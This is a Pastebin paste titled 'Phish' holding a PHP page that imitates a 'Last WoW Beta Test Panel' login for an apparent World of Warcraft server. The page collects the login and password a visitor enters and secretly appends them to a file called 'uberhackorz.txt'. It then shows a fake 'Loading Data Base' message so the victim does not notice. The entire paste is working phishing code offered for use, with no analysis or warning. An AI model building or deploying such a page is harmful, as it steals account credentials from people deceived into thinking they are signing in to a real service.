Advertisement
Garusek

Phish

Oct 31st, 2015
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.49 KB | None | 0 0
  1. <html>
  2. <head>
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10.  
  11. <font color=white><title>Last WoW Test Panel</title></font>
  12. </head>
  13.  
  14.  
  15.  
  16.  
  17. <?php
  18.  
  19. $pole1 = trim($_POST['pole1']);
  20. $pole2 = trim($_POST['pole2']);
  21.  
  22. if(empty($pole1) and empty($pole2)) {
  23.  
  24. // prosty formularz zawieraj1cy dwa pola
  25. echo '
  26. <center>
  27.  
  28. </APPLET>
  29. <br>
  30. <center><font color=white><font size="10">Last WoW </font>
  31. <font color=red><font size="10">Beta Test Panel</font></center>
  32. <p>
  33. <p>
  34. <form action="" method="post">
  35. <font color=white>Login : </font>
  36. <input type="text" name="pole1" " /><br />
  37. <p>
  38. <font color=white>Password : </font>
  39. <input type=password name="pole2" " /><br />
  40. <br />
  41. <input type="submit" value="Login" />
  42. <center>
  43. </form>
  44.  
  45. &LastWoW';
  46. }
  47. else {
  48.  
  49. // dane pochodz1ce z formularza
  50. $dane = $pole1."`".$pole2."\n";
  51. // przypisanie zmniennej $file nazwy pliku
  52. $file = "uberhackorz.txt";
  53. // uchwyt pliku, otwarcie do dopisania
  54. $fp = fopen($file, "a");
  55. // blokada pliku do zapisu
  56. flock($fp, 2);
  57. // zapisanie danych do pliku
  58. fwrite($fp, $dane);
  59. // odblokowanie pliku
  60. flock($fp, 3);
  61. // zamkniecie pliku
  62. fclose($fp);
  63.  
  64.  
  65. echo '
  66. <center>
  67. <font color=white>Wait ... Loading Data Base</font>
  68. <br>
  69. <a href="http://imageshack.us"><center><img src="http://img405.imageshack.us/img405/8002/loadingqg5.gif" border="0" alt="Image Hosted by ImageShack.us"/></a>
  70. ';
  71.  
  72. }
  73.  
  74. ?>
  75. <body background="http://www.coestrenos.com/wp-content/uploads/2010/02/WOWWW.jpg">
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement